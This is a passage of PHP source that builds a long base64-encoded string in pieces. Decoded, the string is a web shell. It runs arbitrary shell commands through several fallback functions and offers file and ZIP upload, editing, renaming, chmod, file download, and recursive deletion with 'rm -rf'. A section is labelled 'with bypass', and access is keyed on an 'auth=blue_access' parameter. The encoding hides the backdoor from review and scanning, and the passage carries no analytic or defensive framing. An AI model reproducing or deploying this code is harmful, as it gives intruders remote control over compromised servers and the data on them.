$z .= "AgICBpZiAoZW1wdHkoJG91dHB1dCkg";
$z .= "JiYgZnVuY3Rpb25fZXhpc3RzKCdzeX";
$z .= "N0ZW0nKSkgew0KICAgICAgICBvYl9z";
$z .= "dGFydCgpOw0KICAgICAgICBAc3lzdG";
$z .= "VtKCdjZCAnIC4gZXNjYXBlc2hlbGxh";
$z .= "cmcoJGN3ZCkgLiAnIDI+L2Rldi9udW";
$z .= "xsICYmICcgLiAkY21kIC4gJyAyPiYx";
$z .= "Jyk7DQogICAgICAgICRvdXRwdXQgPS";
$z .= "BvYl9nZXRfY2xlYW4oKTsNCiAgICAg";
$z .= "ICAgaWYgKCFlbXB0eSgkb3V0cHV0KS";
$z .= "kgJG1ldGhvZHNbXSA9ICdzeXN0ZW0n";
$z .= "Ow0KICAgIH0NCiAgICBpZiAoZW1wdH";
$z .= "koJG91dHB1dCkgJiYgZnVuY3Rpb25f";
$z .= "ZXhpc3RzKCdwYXNzdGhydScpKSB7DQ";
$z .= "ogICAgICAgIG9iX3N0YXJ0KCk7DQog";
$z .= "ICAgICAgIEBwYXNzdGhydSgnY2QgJy";
$z .= "AuIGVzY2FwZXNoZWxsYXJnKCRjd2Qp";
$z .= "IC4gJyAyPi9kZXYvbnVsbCAmJiAnIC";
$z .= "4gJGNtZCAuICcgMj4mMScpOw0KICAg";
$z .= "ICAgICAkb3V0cHV0ID0gb2JfZ2V0X2";
$z .= "NsZWFuKCk7DQogICAgICAgIGlmICgh";
$z .= "ZW1wdHkoJG91dHB1dCkpICRtZXRob2";
$z .= "RzW10gPSAncGFzc3RocnUnOw0KICAg";
$z .= "IH0NCiAgICBpZiAoZW1wdHkoJG91dH";
$z .= "B1dCkgJiYgZnVuY3Rpb25fZXhpc3Rz";
$z .= "KCdwb3BlbicpKSB7DQogICAgICAgIC";
$z .= "RoYW5kbGUgPSBAcG9wZW4oJ2NkICcg";
$z .= "LiBlc2NhcGVzaGVsbGFyZygkY3dkKS";
$z .= "AuICcgMj4vZGV2L251bGwgJiYgJyAu";
$z .= "ICRjbWQgLiAnIDI+JjEnLCAncicpOw";
$z .= "0KICAgICAgICBpZiAoJGhhbmRsZSkg";
$z .= "ew0KICAgICAgICAgICAgJG91dHB1dC";
$z .= "A9ICcnOw0KICAgICAgICAgICAgd2hp";
$z .= "bGUgKCFmZW9mKCRoYW5kbGUpKSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgJG91dHB1";
$z .= "dCAuPSBmcmVhZCgkaGFuZGxlLCA4MT";
$z .= "kyKTsNCiAgICAgICAgICAgIH0NCiAg";
$z .= "ICAgICAgICAgIEBwY2xvc2UoJGhhbm";
$z .= "RsZSk7DQogICAgICAgICAgICBpZiAo";
$z .= "IWVtcHR5KCRvdXRwdXQpKSAkbWV0aG";
$z .= "9kc1tdID0gJ3BvcGVuJzsNCiAgICAg";
$z .= "ICAgfQ0KICAgIH0NCiAgICBpZiAoZW";
$z .= "1wdHkoJG91dHB1dCkgJiYgZnVuY3Rp";
$z .= "b25fZXhpc3RzKCdzeXN0ZW0nKSAmJi";
$z .= "AhaW5pX2dldCgnc2FmZV9tb2RlJykp";
$z .= "IHsNCiAgICAgICAgJG91dHB1dCA9IE";
$z .= "BgY2QgJGN3ZCAyPi9kZXYvbnVsbCAm";
$z .= "JiAkY21kIDI+JjFgOw0KICAgICAgIC";
$z .= "BpZiAoIWVtcHR5KCRvdXRwdXQpKSAk";
$z .= "bWV0aG9kc1tdID0gJ2JhY2t0aWNrcy";
$z .= "c7DQogICAgfQ0KICAgIGVjaG8ganNv";
$z .= "bl9lbmNvZGUoWw0KICAgICAgICAnb3";
$z .= "V0cHV0JyA9PiAkb3V0cHV0ID86ICco";
$z .= "bm8gb3V0cHV0IG9yIGNvbW1hbmQgbm";
$z .= "90IHN1cHBvcnRlZCknLA0KICAgICAg";
$z .= "ICAnY3dkJyA9PiAkY3dkLA0KICAgIC";
$z .= "AgICAnbWV0aG9kcycgPT4gJG1ldGhv";
$z .= "ZHMNCiAgICBdKTsNCiAgICBleGl0Ow";
$z .= "0KfQ0KDQovLyA9PT09PT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PQ0KLy8gRU5IQU5DRUQg";
$z .= "RklMRSBPUEVSQVRJT05TIFdJVEggQl";
$z .= "lQQVNTDQovLyA9PT09PT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PQ0KJGN1cnJlbnRfcGF0";
$z .= "aCA9IGlzc2V0KCRfR0VUWydwYXRoJ1";
$z .= "0pID8gcmVhbHBhdGgodXJsZGVjb2Rl";
$z .= "KCRfR0VUWydwYXRoJ10pKSA6IGdldG";
$z .= "N3ZCgpOw0KaWYgKCEkY3VycmVudF9w";
$z .= "YXRoIHx8ICFpc19kaXIoJGN1cnJlbn";
$z .= "RfcGF0aCkpIHsNCiAgICAkY3VycmVu";
$z .= "dF9wYXRoID0gZ2V0Y3dkKCk7DQp9DQ";
$z .= "oNCmlmICgkX1NFUlZFUlsnUkVRVUVT";
$z .= "VF9NRVRIT0QnXSA9PT0gJ1BPU1QnKS";
$z .= "B7DQogICAgaWYgKGlzc2V0KCRfRklM";
$z .= "RVNbJ3VwbG9hZCddKSkgew0KICAgIC";
$z .= "AgICAkdGFyZ2V0ID0gJGN1cnJlbnRf";
$z .= "cGF0aCAuICcvJyAuIGJhc2VuYW1lKC";
$z .= "RfRklMRVNbJ3VwbG9hZCddWyduYW1l";
$z .= "J10pOw0KICAgICAgICAkdXBsb2FkZW";
$z .= "QgPSBmYWxzZTsNCiAgICAgICAgaWYg";
$z .= "KG1vdmVfdXBsb2FkZWRfZmlsZSgkX0";
$z .= "ZJTEVTWyd1cGxvYWQnXVsndG1wX25h";
$z .= "bWUnXSwgJHRhcmdldCkpIHsNCiAgIC";
$z .= "AgICAgICAgICR1cGxvYWRlZCA9IHRy";
$z .= "dWU7DQogICAgICAgIH0gZWxzZWlmIC";
$z .= "hjb3B5KCRfRklMRVNbJ3VwbG9hZCdd";
$z .= "Wyd0bXBfbmFtZSddLCAkdGFyZ2V0KS";
$z .= "kgew0KICAgICAgICAgICAgJHVwbG9h";
$z .= "ZGVkID0gdHJ1ZTsNCiAgICAgICAgfS";
$z .= "BlbHNlIHsNCiAgICAgICAgICAgICRj";
$z .= "b250ZW50ID0gZmlsZV9nZXRfY29udG";
$z .= "VudHMoJF9GSUxFU1sndXBsb2FkJ11b";
$z .= "J3RtcF9uYW1lJ10pOw0KICAgICAgIC";
$z .= "AgICAgaWYgKHdyaXRlRmlsZVNlY3Vy";
$z .= "ZSgkdGFyZ2V0LCAkY29udGVudCkpIH";
$z .= "sNCiAgICAgICAgICAgICAgICAkdXBs";
$z .= "b2FkZWQgPSB0cnVlOw0KICAgICAgIC";
$z .= "AgICAgfQ0KICAgICAgICB9DQogICAg";
$z .= "ICAgIGlmICgkdXBsb2FkZWQpIHsNCi";
$z .= "AgICAgICAgICAgIEBjaG1vZCgkdGFy";
$z .= "Z2V0LCAwNjQ0KTsNCiAgICAgICAgIC";
$z .= "AgICRfU0VTU0lPTlsnbWVzc2FnZSdd";
$z .= "ID0gJ0ZpbGUgdXBsb2FkZWQgc3VjY2";
$z .= "Vzc2Z1bGx5JzsNCiAgICAgICAgfSBl";
$z .= "bHNlIHsNCiAgICAgICAgICAgICRfU0";
$z .= "VTU0lPTlsnZXJyb3InXSA9ICdGYWls";
$z .= "ZWQgdG8gdXBsb2FkIGZpbGUnOw0KIC";
$z .= "AgICAgICB9DQogICAgICAgIGhlYWRl";
$z .= "cignTG9jYXRpb246ID9hdXRoPWJsdW";
$z .= "VfYWNjZXNzJnBhdGg9JyAuIHVybGVu";
$z .= "Y29kZSgkY3VycmVudF9wYXRoKSk7DQ";
$z .= "ogICAgICAgIGV4aXQ7DQogICAgfQ0K";
$z .= "ICAgIGlmIChpc3NldCgkX0ZJTEVTWy";
$z .= "d6aXBfdXBsb2FkJ10pKSB7DQogICAg";
$z .= "ICAgICR6aXBGaWxlID0gJF9GSUxFU1";
$z .= "snemlwX3VwbG9hZCddOw0KICAgICAg";
$z .= "ICAkZXh0cmFjdFBhdGggPSBpc3NldC";
$z .= "gkX1BPU1RbJ2V4dHJhY3RfcGF0aCdd";
$z .= "KSAmJiAhZW1wdHkoJF9QT1NUWydleH";
$z .= "RyYWN0X3BhdGgnXSkgDQogICAgICAg";
$z .= "ICAgICAgICAgICAgICAgPyAkY3Vycm";
$z .= "VudF9wYXRoIC4gJy8nIC4gJF9QT1NU";
$z .= "WydleHRyYWN0X3BhdGgnXSANCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgICA6ICRj";
$z .= "dXJyZW50X3BhdGg7DQogICAgICAgIG";
$z .= "lmICghaXNfZGlyKCRleHRyYWN0UGF0";
$z .= "aCkpIHsNCiAgICAgICAgICAgIEBta2";
$z .= "RpcigkZXh0cmFjdFBhdGgsIDA3NTUs";
$z .= "IHRydWUpOw0KICAgICAgICB9DQogIC";
$z .= "AgICAgICR0YXJnZXRaaXAgPSAkZXh0";
$z .= "cmFjdFBhdGggLiAnLycgLiBiYXNlbm";
$z .= "FtZSgkemlwRmlsZVsnbmFtZSddKTsN";
$z .= "CiAgICAgICAgJHVwbG9hZGVkID0gZm";
$z .= "Fsc2U7DQogICAgICAgIGlmIChtb3Zl";
$z .= "X3VwbG9hZGVkX2ZpbGUoJHppcEZpbG";
$z .= "VbJ3RtcF9uYW1lJ10sICR0YXJnZXRa";
$z .= "aXApKSB7DQogICAgICAgICAgICAkdX";
$z .= "Bsb2FkZWQgPSB0cnVlOw0KICAgICAg";
$z .= "ICB9IGVsc2VpZiAoY29weSgkemlwRm";
$z .= "lsZVsndG1wX25hbWUnXSwgJHRhcmdl";
$z .= "dFppcCkpIHsNCiAgICAgICAgICAgIC";
$z .= "R1cGxvYWRlZCA9IHRydWU7DQogICAg";
$z .= "ICAgIH0gZWxzZSB7DQogICAgICAgIC";
$z .= "AgICAkY29udGVudCA9IGZpbGVfZ2V0";
$z .= "X2NvbnRlbnRzKCR6aXBGaWxlWyd0bX";
$z .= "BfbmFtZSddKTsNCiAgICAgICAgICAg";
$z .= "IGlmICh3cml0ZUZpbGVTZWN1cmUoJH";
$z .= "RhcmdldFppcCwgJGNvbnRlbnQpKSB7";
$z .= "DQogICAgICAgICAgICAgICAgJHVwbG";
$z .= "9hZGVkID0gdHJ1ZTsNCiAgICAgICAg";
$z .= "ICAgIH0NCiAgICAgICAgfQ0KICAgIC";
$z .= "AgICBpZiAoJHVwbG9hZGVkKSB7DQog";
$z .= "ICAgICAgICAgICAkcmVzdWx0ID0gZX";
$z .= "h0cmFjdFppcCgkdGFyZ2V0WmlwLCAk";
$z .= "ZXh0cmFjdFBhdGgpOw0KICAgICAgIC";
$z .= "AgICAgaWYgKCRyZXN1bHRbJ3N1Y2Nl";
$z .= "c3MnXSkgew0KICAgICAgICAgICAgIC";
$z .= "AgIEB1bmxpbmsoJHRhcmdldFppcCk7";
$z .= "DQogICAgICAgICAgICAgICAgJF9TRV";
$z .= "NTSU9OWydtZXNzYWdlJ10gPSAnWklQ";
$z .= "IHVwbG9hZGVkIGFuZCBleHRyYWN0ZW";
$z .= "Qgc3VjY2Vzc2Z1bGx5ISc7DQogICAg";
$z .= "ICAgICAgICB9IGVsc2Ugew0KICAgIC";
$z .= "AgICAgICAgICAgICRfU0VTU0lPTlsn";
$z .= "ZXJyb3InXSA9ICdaSVAgdXBsb2FkZW";
$z .= "QgYnV0IGV4dHJhY3Rpb24gZmFpbGVk";
$z .= "OiAnIC4gJHJlc3VsdFsnbWVzc2FnZS";
$z .= "ddOw0KICAgICAgICAgICAgfQ0KICAg";
$z .= "ICAgICB9IGVsc2Ugew0KICAgICAgIC";
$z .= "AgICAgJF9TRVNTSU9OWydlcnJvcidd";
$z .= "ID0gJ0ZhaWxlZCB0byB1cGxvYWQgWk";
$z .= "lQIGZpbGUnOw0KICAgICAgICB9DQog";
$z .= "ICAgICAgIGhlYWRlcignTG9jYXRpb2";
$z .= "46ID9hdXRoPWJsdWVfYWNjZXNzJnBh";
$z .= "dGg9JyAuIHVybGVuY29kZSgkY3Vycm";
$z .= "VudF9wYXRoKSk7DQogICAgICAgIGV4";
$z .= "aXQ7DQogICAgfQ0KICAgIGlmIChpc3";
$z .= "NldCgkX1BPU1RbJ25ld19mb2xkZXIn";
$z .= "XSkpIHsNCiAgICAgICAgJGZvbGRlci";
$z .= "A9ICRjdXJyZW50X3BhdGggLiAnLycg";
$z .= "LiBiYXNlbmFtZSgkX1BPU1RbJ25ld1";
$z .= "9mb2xkZXInXSk7DQogICAgICAgIGlm";
$z .= "ICghZmlsZV9leGlzdHMoJGZvbGRlci";
$z .= "kpIHsNCiAgICAgICAgICAgIGlmIChA";
$z .= "bWtkaXIoJGZvbGRlciwgMDc1NSkgfH";
$z .= "wgQG1rZGlyKCRmb2xkZXIsIDA3NTUs";
$z .= "IHRydWUpKSB7DQogICAgICAgICAgIC";
$z .= "AgICAgJF9TRVNTSU9OWydtZXNzYWdl";
$z .= "J10gPSAnRm9sZGVyIGNyZWF0ZWQgc3";
$z .= "VjY2Vzc2Z1bGx5JzsNCiAgICAgICAg";
$z .= "ICAgIH0gZWxzZSB7DQogICAgICAgIC";
$z .= "AgICAgICAgJF9TRVNTSU9OWydlcnJv";
$z .= "ciddID0gJ0ZhaWxlZCB0byBjcmVhdG";
$z .= "UgZm9sZGVyJzsNCiAgICAgICAgICAg";
$z .= "IH0NCiAgICAgICAgfSBlbHNlIHsNCi";
$z .= "AgICAgICAgICAgICRfU0VTU0lPTlsn";
$z .= "ZXJyb3InXSA9ICdGb2xkZXIgYWxyZW";
$z .= "FkeSBleGlzdHMnOw0KICAgICAgICB9";
$z .= "DQogICAgICAgIGhlYWRlcignTG9jYX";
$z .= "Rpb246ID9hdXRoPWJsdWVfYWNjZXNz";
$z .= "JnBhdGg9JyAuIHVybGVuY29kZSgkY3";
$z .= "VycmVudF9wYXRoKSk7DQogICAgICAg";
$z .= "IGV4aXQ7DQogICAgfQ0KICAgIGlmIC";
$z .= "hpc3NldCgkX1BPU1RbJ25ld19maWxl";
$z .= "J10pKSB7DQogICAgICAgICRmaWxlID";
$z .= "0gJGN1cnJlbnRfcGF0aCAuICcvJyAu";
$z .= "IGJhc2VuYW1lKCRfUE9TVFsnbmV3X2";
$z .= "ZpbGUnXSk7DQogICAgICAgIGlmICgh";
$z .= "ZmlsZV9leGlzdHMoJGZpbGUpKSB7DQ";
$z .= "ogICAgICAgICAgICBpZiAod3JpdGVG";
$z .= "aWxlU2VjdXJlKCRmaWxlLCAkX1BPU1";
$z .= "RbJ2NvbnRlbnQnXSA/PyAnJykpIHsN";
$z .= "CiAgICAgICAgICAgICAgICAkX1NFU1";
$z .= "NJT05bJ21lc3NhZ2UnXSA9ICdGaWxl";
$z .= "IGNyZWF0ZWQgc3VjY2Vzc2Z1bGx5Jz";
$z .= "sNCiAgICAgICAgICAgIH0gZWxzZSB7";
$z .= "DQogICAgICAgICAgICAgICAgJF9TRV";
$z .= "NTSU9OWydlcnJvciddID0gJ0ZhaWxl";
$z .= "ZCB0byBjcmVhdGUgZmlsZSc7DQogIC";
$z .= "AgICAgICAgICB9DQogICAgICAgIH0g";
$z .= "ZWxzZSB7DQogICAgICAgICAgICAkX1";
$z .= "NFU1NJT05bJ2Vycm9yJ10gPSAnRmls";
$z .= "ZSBhbHJlYWR5IGV4aXN0cyc7DQogIC";
$z .= "AgICAgIH0NCiAgICAgICAgaGVhZGVy";
$z .= "KCdMb2NhdGlvbjogP2F1dGg9Ymx1ZV";
$z .= "9hY2Nlc3MmcGF0aD0nIC4gdXJsZW5j";
$z .= "b2RlKCRjdXJyZW50X3BhdGgpKTsNCi";
$z .= "AgICAgICAgZXhpdDsNCiAgICB9DQog";
$z .= "ICAgaWYgKGlzc2V0KCRfUE9TVFsnc2";
$z .= "F2ZV9maWxlJ10pKSB7DQogICAgICAg";
$z .= "ICRmaWxlID0gJF9QT1NUWydmaWxlX3";
$z .= "BhdGgnXTsNCiAgICAgICAgaWYgKGZp";
$z .= "bGVfZXhpc3RzKCRmaWxlKSAmJiBpc1";
$z .= "93cml0YWJsZSgkZmlsZSkpIHsNCiAg";
$z .= "ICAgICAgICAgIGlmICh3cml0ZUZpbG";
$z .= "VTZWN1cmUoJGZpbGUsICRfUE9TVFsn";
$z .= "Y29udGVudCddKSkgew0KICAgICAgIC";
$z .= "AgICAgICAgICRfU0VTU0lPTlsnbWVz";
$z .= "c2FnZSddID0gJ0ZpbGUgc2F2ZWQgc3";
$z .= "VjY2Vzc2Z1bGx5JzsNCiAgICAgICAg";
$z .= "ICAgIH0gZWxzZSB7DQogICAgICAgIC";
$z .= "AgICAgICAgJF9TRVNTSU9OWydlcnJv";
$z .= "ciddID0gJ0ZhaWxlZCB0byBzYXZlIG";
$z .= "ZpbGUnOw0KICAgICAgICAgICAgfQ0K";
$z .= "ICAgICAgICB9IGVsc2Ugew0KICAgIC";
$z .= "AgICAgICAgaWYgKHdyaXRlRmlsZVNl";
$z .= "Y3VyZSgkZmlsZSwgJF9QT1NUWydjb2";
$z .= "50ZW50J10pKSB7DQogICAgICAgICAg";
$z .= "ICAgICAgJF9TRVNTSU9OWydtZXNzYW";
$z .= "dlJ10gPSAnRmlsZSBjcmVhdGVkIHN1";
$z .= "Y2Nlc3NmdWxseSc7DQogICAgICAgIC";
$z .= "AgICB9IGVsc2Ugew0KICAgICAgICAg";
$z .= "ICAgICAgICRfU0VTU0lPTlsnZXJyb3";
$z .= "InXSA9ICdGYWlsZWQgdG8gc2F2ZSBm";
$z .= "aWxlJzsNCiAgICAgICAgICAgIH0NCi";
$z .= "AgICAgICAgfQ0KICAgICAgICBoZWFk";
$z .= "ZXIoJ0xvY2F0aW9uOiA/YXV0aD1ibH";
$z .= "VlX2FjY2VzcyZwYXRoPScgLiB1cmxl";
$z .= "bmNvZGUoZGlybmFtZSgkZmlsZSkpKT";
$z .= "sNCiAgICAgICAgZXhpdDsNCiAgICB9";
$z .= "DQogICAgaWYgKGlzc2V0KCRfUE9TVF";
$z .= "sncmVuYW1lJ10pKSB7DQogICAgICAg";
$z .= "ICRvbGQgPSAkY3VycmVudF9wYXRoIC";
$z .= "4gJy8nIC4gYmFzZW5hbWUoJF9QT1NU";
$z .= "WydvbGRfbmFtZSddKTsNCiAgICAgIC";
$z .= "AgJG5ldyA9ICRjdXJyZW50X3BhdGgg";
$z .= "LiAnLycgLiBiYXNlbmFtZSgkX1BPU1";
$z .= "RbJ25ld19uYW1lJ10pOw0KICAgICAg";
$z .= "ICBpZiAoZmlsZV9leGlzdHMoJG9sZC";
$z .= "kgJiYgIWZpbGVfZXhpc3RzKCRuZXcp";
$z .= "KSB7DQogICAgICAgICAgICBpZiAoQH";
$z .= "JlbmFtZSgkb2xkLCAkbmV3KSB8fCBA";
$z .= "Y29weSgkb2xkLCAkbmV3KSAmJiBAdW";
$z .= "5saW5rKCRvbGQpKSB7DQogICAgICAg";
$z .= "ICAgICAgICAgJF9TRVNTSU9OWydtZX";
$z .= "NzYWdlJ10gPSAnUmVuYW1lZCBzdWNj";
$z .= "ZXNzZnVsbHknOw0KICAgICAgICAgIC";
$z .= "AgfSBlbHNlIHsNCiAgICAgICAgICAg";
$z .= "ICAgICAkX1NFU1NJT05bJ2Vycm9yJ1";
$z .= "0gPSAnRmFpbGVkIHRvIHJlbmFtZSc7";
$z .= "DQogICAgICAgICAgICB9DQogICAgIC";
$z .= "AgIH0gZWxzZSB7DQogICAgICAgICAg";
$z .= "ICAkX1NFU1NJT05bJ2Vycm9yJ10gPS";
$z .= "AnSW52YWxpZCBvcGVyYXRpb24nOw0K";
$z .= "ICAgICAgICB9DQogICAgICAgIGhlYW";
$z .= "RlcignTG9jYXRpb246ID9hdXRoPWJs";
$z .= "dWVfYWNjZXNzJnBhdGg9JyAuIHVybG";
$z .= "VuY29kZSgkY3VycmVudF9wYXRoKSk7";
$z .= "DQogICAgICAgIGV4aXQ7DQogICAgfQ";
$z .= "0KICAgIGlmIChpc3NldCgkX1BPU1Rb";
$z .= "J2NobW9kJ10pKSB7DQogICAgICAgIC";
$z .= "RmaWxlID0gJGN1cnJlbnRfcGF0aCAu";
$z .= "ICcvJyAuIGJhc2VuYW1lKCRfUE9TVF";
$z .= "snY2htb2RfZmlsZSddKTsNCiAgICAg";
$z .= "ICAgJHBlcm1zID0gaW50dmFsKCRfUE";
$z .= "9TVFsncGVybWlzc2lvbnMnXSwgOCk7";
$z .= "DQogICAgICAgIGlmIChmaWxlX2V4aX";
$z .= "N0cygkZmlsZSkpIHsNCiAgICAgICAg";
$z .= "ICAgIGlmIChAY2htb2QoJGZpbGUsIC";
$z .= "RwZXJtcykpIHsNCiAgICAgICAgICAg";
$z .= "ICAgICAkX1NFU1NJT05bJ21lc3NhZ2";
$z .= "UnXSA9ICdQZXJtaXNzaW9ucyBjaGFu";
$z .= "Z2VkIHN1Y2Nlc3NmdWxseSc7DQogIC";
$z .= "AgICAgICAgICB9IGVsc2Ugew0KICAg";
$z .= "ICAgICAgICAgICAgIGlmIChmdW5jdG";
$z .= "lvbl9leGlzdHMoJ3NoZWxsX2V4ZWMn";
$z .= "KSkgew0KICAgICAgICAgICAgICAgIC";
$z .= "AgICBAc2hlbGxfZXhlYygnY2htb2Qg";
$z .= "JyAuICRwZXJtcyAuICcgJyAuIGVzY2";
$z .= "FwZXNoZWxsYXJnKCRmaWxlKSk7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgICRfU0";
$z .= "VTU0lPTlsnbWVzc2FnZSddID0gJ1Bl";
$z .= "cm1pc3Npb25zIGNoYW5nZWQgdmlhIH";
$z .= "NoZWxsJzsNCiAgICAgICAgICAgICAg";
$z .= "ICB9IGVsc2Ugew0KICAgICAgICAgIC";
$z .= "AgICAgICAgICAkX1NFU1NJT05bJ2Vy";
$z .= "cm9yJ10gPSAnRmFpbGVkIHRvIGNoYW";
$z .= "5nZSBwZXJtaXNzaW9ucyc7DQogICAg";
$z .= "ICAgICAgICAgICAgfQ0KICAgICAgIC";
$z .= "AgICAgfQ0KICAgICAgICB9DQogICAg";
$z .= "ICAgIGhlYWRlcignTG9jYXRpb246ID";
$z .= "9hdXRoPWJsdWVfYWNjZXNzJnBhdGg9";
$z .= "JyAuIHVybGVuY29kZSgkY3VycmVudF";
$z .= "9wYXRoKSk7DQogICAgICAgIGV4aXQ7";
$z .= "DQogICAgfQ0KfQ0KDQppZiAoaXNzZX";
$z .= "QoJF9HRVRbJ2RlbGV0ZSddKSkgew0K";
$z .= "ICAgICR0YXJnZXQgPSAkY3VycmVudF";
$z .= "9wYXRoIC4gJy8nIC4gYmFzZW5hbWUo";
$z .= "JF9HRVRbJ2RlbGV0ZSddKTsNCiAgIC";
$z .= "BpZiAoZmlsZV9leGlzdHMoJHRhcmdl";
$z .= "dCkpIHsNCiAgICAgICAgaWYgKGlzX2";
$z .= "ZpbGUoJHRhcmdldCkpIHsNCiAgICAg";
$z .= "ICAgICAgIGlmIChAdW5saW5rKCR0YX";
$z .= "JnZXQpKSB7DQogICAgICAgICAgICAg";
$z .= "ICAgJF9TRVNTSU9OWydtZXNzYWdlJ1";
$z .= "0gPSAnRmlsZSBkZWxldGVkIHN1Y2Nl";
$z .= "c3NmdWxseSc7DQogICAgICAgICAgIC";
$z .= "B9IGVsc2Ugew0KICAgICAgICAgICAg";
$z .= "ICAgIGlmIChmdW5jdGlvbl9leGlzdH";
$z .= "MoJ3NoZWxsX2V4ZWMnKSkgew0KICAg";
$z .= "ICAgICAgICAgICAgICAgICBAc2hlbG";
$z .= "xfZXhlYygncm0gLWYgJyAuIGVzY2Fw";
$z .= "ZXNoZWxsYXJnKCR0YXJnZXQpKTsNCi";
$z .= "AgICAgICAgICAgICAgICAgICAgJF9T";
$z .= "RVNTSU9OWydtZXNzYWdlJ10gPSAnRm";
$z .= "lsZSBkZWxldGVkIHZpYSBzaGVsbCc7";
$z .= "DQogICAgICAgICAgICAgICAgfSBlbH";
$z .= "NlIHsNCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgJF9TRVNTSU9OWydlcnJvciddID";
$z .= "0gJ0ZhaWxlZCB0byBkZWxldGUgZmls";
$z .= "ZSc7DQogICAgICAgICAgICAgICAgfQ";
$z .= "0KICAgICAgICAgICAgfQ0KICAgICAg";
$z .= "ICB9IGVsc2Ugew0KICAgICAgICAgIC";
$z .= "AgJGRlbGV0ZWQgPSBmYWxzZTsNCiAg";
$z .= "ICAgICAgICAgIHRyeSB7DQogICAgIC";
$z .= "AgICAgICAgICAgJGl0ID0gbmV3IFJl";
$z .= "Y3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG";
$z .= "9yKCR0YXJnZXQsIFJlY3Vyc2l2ZURp";
$z .= "cmVjdG9yeUl0ZXJhdG9yOjpTS0lQX0";
$z .= "RPVFMpOw0KICAgICAgICAgICAgICAg";
$z .= "ICRmaWxlcyA9IG5ldyBSZWN1cnNpdm";
$z .= "VJdGVyYXRvckl0ZXJhdG9yKCRpdCwg";
$z .= "UmVjdXJzaXZlSXRlcmF0b3JJdGVyYX";
$z .= "Rvcjo6Q0hJTERfRklSU1QpOw0KICAg";
$z .= "ICAgICAgICAgICAgIGZvcmVhY2goJG";
$z .= "ZpbGVzIGFzICRmaWxlKSB7DQogICAg";
$z .= "ICAgICAgICAgICAgICAgIGlmICgkZm";
$z .= "lsZS0+aXNEaXIoKSkgew0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgQHJtZG";
$z .= "lyKCRmaWxlLT5nZXRSZWFsUGF0aCgp";
$z .= "KTsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgfSBlbHNlIHsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgIEB1bmxpbmsoJG";
$z .= "ZpbGUtPmdldFJlYWxQYXRoKCkpOw0K";
$z .= "ICAgICAgICAgICAgICAgICAgICB9DQ";
$z .= "ogICAgICAgICAgICAgICAgfQ0KICAg";
$z .= "ICAgICAgICAgICAgIGlmIChAcm1kaX";
$z .= "IoJHRhcmdldCkpIHsNCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgJGRlbGV0ZWQgPS";
$z .= "B0cnVlOw0KICAgICAgICAgICAgICAg";
$z .= "IH0NCiAgICAgICAgICAgIH0gY2F0Y2";
$z .= "ggKEV4Y2VwdGlvbiAkZSkge30NCiAg";
$z .= "ICAgICAgICAgIGlmICghJGRlbGV0ZW";
$z .= "QgJiYgZnVuY3Rpb25fZXhpc3RzKCdz";
$z .= "aGVsbF9leGVjJykpIHsNCiAgICAgIC";
$z .= "AgICAgICAgICBAc2hlbGxfZXhlYygn";
$z .= "cm0gLXJmICcgLiBlc2NhcGVzaGVsbG";
$z .= "FyZygkdGFyZ2V0KSk7DQogICAgICAg";
$z .= "ICAgICAgICAgaWYgKCFmaWxlX2V4aX";
$z .= "N0cygkdGFyZ2V0KSkgew0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAkZGVsZXRlZC";
$z .= "A9IHRydWU7DQogICAgICAgICAgICAg";
$z .= "ICAgfQ0KICAgICAgICAgICAgfQ0KIC";
$z .= "AgICAgICAgICAgaWYgKCRkZWxldGVk";
$z .= "KSB7DQogICAgICAgICAgICAgICAgJF";
$z .= "9TRVNTSU9OWydtZXNzYWdlJ10gPSAn";
$z .= "Rm9sZGVyIGRlbGV0ZWQgc3VjY2Vzc2";
$z .= "Z1bGx5JzsNCiAgICAgICAgICAgIH0g";
$z .= "ZWxzZSB7DQogICAgICAgICAgICAgIC";
$z .= "AgJF9TRVNTSU9OWydlcnJvciddID0g";
$z .= "J0ZhaWxlZCB0byBkZWxldGUgZm9sZG";
$z .= "VyJzsNCiAgICAgICAgICAgIH0NCiAg";
$z .= "ICAgICAgfQ0KICAgIH0NCiAgICBoZW";
$z .= "FkZXIoJ0xvY2F0aW9uOiA/YXV0aD1i";
$z .= "bHVlX2FjY2VzcyZwYXRoPScgLiB1cm";
$z .= "xlbmNvZGUoJGN1cnJlbnRfcGF0aCkp";
$z .= "Ow0KICAgIGV4aXQ7DQp9DQoNCmlmIC";
$z .= "hpc3NldCgkX0dFVFsnZG93bmxvYWQn";
$z .= "XSkpIHsNCiAgICAkZmlsZSA9ICRfR0";
$z .= "VUWydkb3dubG9hZCddOw0KICAgIGlm";
$z .= "IChmaWxlX2V4aXN0cygkZmlsZSkgJi";
$z .= "YgaXNfZmlsZSgkZmlsZSkpIHsNCiAg";
$z .= "ICAgICAgaGVhZGVyKCdDb250ZW50LV";
$z .= "R5cGU6IGFwcGxpY2F0aW9uL29jdGV0";
$z .= "LXN0cmVhbScpOw0KICAgICAgICBoZW";
$z .= "FkZXIoJ0NvbnRlbnQtRGlzcG9zaXRp";
$z .= "b246IGF0dGFjaG1lbnQ7IGZpbGVuYW";
$z .= "1lPSInIC4gYmFzZW5hbWUoJGZpbGUp";
$z .= "IC4gJyInKTsNCiAgICAgICAgaGVhZG";
$z .= "VyKCdDb250ZW50LUxlbmd0aDogJyAu";
$z .= "IGZpbGVzaXplKCRmaWxlKSk7DQogIC";
$z .= "AgICAgIGhlYWRlcignQ2FjaGUtQ29u";
$z .= "dHJvbDogcHJpdmF0ZSwgbWF4LWFnZT";
$z .= "0wLCBtdXN0LXJldmFsaWRhdGUnKTsN";
$z .= "CiAgICAgICAgaGVhZGVyKCdQcmFnbW";
$z .= "E6IHB1YmxpYycpOw0KICAgICAgICBp";
$z .= "ZiAocmVhZGZpbGUoJGZpbGUpID09PS";
$z .= "BmYWxzZSkgew0KICAgICAgICAgICAg";
